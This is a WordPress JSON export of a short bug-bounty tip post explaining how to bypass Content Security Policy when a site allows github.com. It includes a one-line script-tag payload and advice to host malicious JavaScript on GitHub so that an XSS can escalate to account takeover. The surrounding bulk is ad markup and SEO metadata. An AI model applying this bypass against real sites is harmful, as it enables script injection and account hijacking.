{"id":4009,"date":"2023-10-19T05:20:54","date_gmt":"2023-10-19T05:20:54","guid":{"rendered":"https:\/\/secry.me\/explore\/?p=4009"},"modified":"2023-10-22T11:56:06","modified_gmt":"2023-10-22T11:56:06","slug":"bypass-csp-for-bug-bounty-leveraging-github-for-script-execution","status":"publish","type":"post","link":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/","title":{"rendered":"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution"},"content":{"rendered":"<div class=\"c7f5092f831f91fb6af859cc3a8052cc\" data-index=\"4\" style=\"float: none; margin:10px 0 10px 0; text-align:center;\">\n<script async src=\"https:\/\/securepubads.g.doubleclick.net\/tag\/js\/gpt.js\"><\/script>\r\n<script>\r\n  window.googletag = window.googletag || {cmd: []};\r\n  googletag.cmd.push(function() {\r\n    googletag.defineSlot('\/22608490431\/iklan1', [[320, 100], [300, 50]], 'div-gpt-ad-1696178236578-0').addService(googletag.pubads());\r\n    googletag.pubads().enableSingleRequest();\r\n    googletag.enableServices();\r\n  });\r\n<\/script>\r\n<!-- \/22608490431\/iklan1 -->\r\n<div id='div-gpt-ad-1696178236578-0' style='min-width: 300px; min-height: 50px;'>\r\n  <script>\r\n    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1696178236578-0'); });\r\n  <\/script>\r\n<\/div>\n<\/div>\n<p>A Cyber Security Researcher named Omar shared <a href=\"https:\/\/secry.me\/explore\/bug-bounty\/\">bug bounty<\/a> tips on their LinkedIn account about how to BYPASS CSP. He mentioned that bypassing the <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/CSP\">Content Security Policy<\/a> (CSP) is possible when a website allows &#8220;github.com&#8221; in a script-src or default-src directive.<\/p>\n<h4>An example Proof of Concept (POC) looks something like this:<\/h4>\n<pre class=\"wp-block-code\"><code>&lt;script src=https:\/\/api.github.com\/gist\/anything?\u2026&lt;\/script&gt;<\/code><\/pre>\n<p>In real-world scenarios, the GitHub link can be replaced with a link to the raw GitHub location of a malicious script.<\/p>\n<p>Based on my experience as a web admin of this secry.me&#8217;s web, and as a bug hunter, this CSP bypass technique can be valuable when attempting to escalate an XSS bug to account takeover or privilege escalation. If you need a lengthy JavaScript script for this purpose, you can use GitHub to host the malicious JavaScript and call it for execution on the target web using &#8220;&lt;script src&gt;.&#8221;<\/p>\n<p>&nbsp;<\/p>\n<p><em><strong>This tip is shared by octagon-network.<\/strong><\/em><\/p>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n\n<div style=\"font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;\"><\/div>","protected":false},"excerpt":{"rendered":"<p>A Cyber Security Researcher named Omar shared bug bounty tips on their LinkedIn account about how to BYPASS CSP. He mentioned that bypassing the Content Security Policy (CSP) is possible when a website allows &#8220;github.com&#8221; in a script-src or default-src directive. An example Proof of Concept (POC) looks something like this: &lt;script src=https:\/\/api.github.com\/gist\/anything?\u2026&lt;\/script&gt; In real-world [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4010,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[136,195],"tags":[355,354,192,307,356],"class_list":{"0":"post-4009","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bug-bounty","8":"category-tips-and-tricks","9":"tag-bug-bounty-tips","10":"tag-csp-bypass","11":"tag-cyber-security","12":"tag-cybersecurity","13":"tag-github"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v21.4 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution | SECRY<\/title>\n<meta name=\"description\" content=\"A Cyber Security Researcher named Omar shared bug bounty tips on their LinkedIn account about how to BYPASS CSP. He mentioned that bypassing the Content\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution | SECRY\" \/>\n<meta property=\"og:description\" content=\"A Cyber Security Researcher named Omar shared bug bounty tips on their LinkedIn account about how to BYPASS CSP. He mentioned that bypassing the Content\" \/>\n<meta property=\"og:url\" content=\"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/\" \/>\n<meta property=\"og:site_name\" content=\"SECRY\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/secry.me\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-19T05:20:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-22T11:56:06+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/secryweb.sirv.com\/WP_secry.me\/2023\/10\/Bypass-CSP-Using-Github.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"490\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Christin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Christin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"NewsArticle\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/\"},\"author\":{\"name\":\"Christin\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/bf08de9f590b8968a1d054728257190f\"},\"headline\":\"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution\",\"datePublished\":\"2023-10-19T05:20:54+00:00\",\"dateModified\":\"2023-10-22T11:56:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/\"},\"wordCount\":161,\"commentCount\":1,\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/Bypass-CSP-Using-Github.jpeg\",\"keywords\":[\"Bug Bounty Tips\",\"CSP Bypass\",\"Cyber Security\",\"CyberSecurity\",\"Github\"],\"articleSection\":[\"Bug Bounty\",\"Tips and Tricks\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/\",\"name\":\"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution | SECRY\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/Bypass-CSP-Using-Github.jpeg\",\"datePublished\":\"2023-10-19T05:20:54+00:00\",\"dateModified\":\"2023-10-22T11:56:06+00:00\",\"description\":\"A Cyber Security Researcher named Omar shared bug bounty tips on their LinkedIn account about how to BYPASS CSP. He mentioned that bypassing the Content\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/#primaryimage\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/Bypass-CSP-Using-Github.jpeg\",\"contentUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/Bypass-CSP-Using-Github.jpeg\",\"width\":800,\"height\":490,\"caption\":\"Bypass CSP Using Github\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/secry.me\\\/explore\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"name\":\"SECRY\",\"description\":\"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections\",\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"alternateName\":\"Security Story\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/secry.me\\\/explore\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\",\"name\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\",\"alternateName\":\"SECRY\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"contentUrl\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"width\":512,\"height\":512,\"caption\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/secry.me\",\"https:\\\/\\\/pinterest.com\\\/secry_me\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/bf08de9f590b8968a1d054728257190f\",\"name\":\"Christin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"caption\":\"Christin\"},\"description\":\"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.\",\"sameAs\":[\"https:\\\/\\\/secry.me\\\/explore\"],\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/author\\\/secry\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution | SECRY","description":"A Cyber Security Researcher named Omar shared bug bounty tips on their LinkedIn account about how to BYPASS CSP. He mentioned that bypassing the Content","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/","og_locale":"en_US","og_type":"article","og_title":"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution | SECRY","og_description":"A Cyber Security Researcher named Omar shared bug bounty tips on their LinkedIn account about how to BYPASS CSP. He mentioned that bypassing the Content","og_url":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/","og_site_name":"SECRY","article_publisher":"https:\/\/www.facebook.com\/secry.me","article_published_time":"2023-10-19T05:20:54+00:00","article_modified_time":"2023-10-22T11:56:06+00:00","og_image":[{"width":800,"height":490,"url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2023\/10\/Bypass-CSP-Using-Github.jpeg","type":"image\/jpeg"}],"author":"Christin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Christin","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/#article","isPartOf":{"@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/"},"author":{"name":"Christin","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/bf08de9f590b8968a1d054728257190f"},"headline":"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution","datePublished":"2023-10-19T05:20:54+00:00","dateModified":"2023-10-22T11:56:06+00:00","mainEntityOfPage":{"@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/"},"wordCount":161,"commentCount":1,"publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"image":{"@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/10\/Bypass-CSP-Using-Github.jpeg","keywords":["Bug Bounty Tips","CSP Bypass","Cyber Security","CyberSecurity","Github"],"articleSection":["Bug Bounty","Tips and Tricks"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/","url":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/","name":"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution | SECRY","isPartOf":{"@id":"https:\/\/secry.me\/explore\/#website"},"primaryImageOfPage":{"@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/#primaryimage"},"image":{"@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/10\/Bypass-CSP-Using-Github.jpeg","datePublished":"2023-10-19T05:20:54+00:00","dateModified":"2023-10-22T11:56:06+00:00","description":"A Cyber Security Researcher named Omar shared bug bounty tips on their LinkedIn account about how to BYPASS CSP. He mentioned that bypassing the Content","breadcrumb":{"@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/#primaryimage","url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/10\/Bypass-CSP-Using-Github.jpeg","contentUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/10\/Bypass-CSP-Using-Github.jpeg","width":800,"height":490,"caption":"Bypass CSP Using Github"},{"@type":"BreadcrumbList","@id":"https:\/\/secry.me\/explore\/bypass-csp-for-bug-bounty-leveraging-github-for-script-execution\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/secry.me\/explore\/"},{"@type":"ListItem","position":2,"name":"Bypass CSP for Bug Bounty: Leveraging GitHub for Script Execution"}]},{"@type":"WebSite","@id":"https:\/\/secry.me\/explore\/#website","url":"https:\/\/secry.me\/explore\/","name":"SECRY","description":"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections","publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"alternateName":"Security Story","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/secry.me\/explore\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/secry.me\/explore\/#organization","name":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections","alternateName":"SECRY","url":"https:\/\/secry.me\/explore\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/","url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","contentUrl":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","width":512,"height":512,"caption":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections"},"image":{"@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/secry.me","https:\/\/pinterest.com\/secry_me"]},{"@type":"Person","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/bf08de9f590b8968a1d054728257190f","name":"Christin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","caption":"Christin"},"description":"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.","sameAs":["https:\/\/secry.me\/explore"],"url":"https:\/\/secry.me\/explore\/author\/secry\/"}]}},"_links":{"self":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/comments?post=4009"}],"version-history":[{"count":4,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4009\/revisions"}],"predecessor-version":[{"id":4044,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4009\/revisions\/4044"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media\/4010"}],"wp:attachment":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media?parent=4009"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/categories?post=4009"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/tags?post=4009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}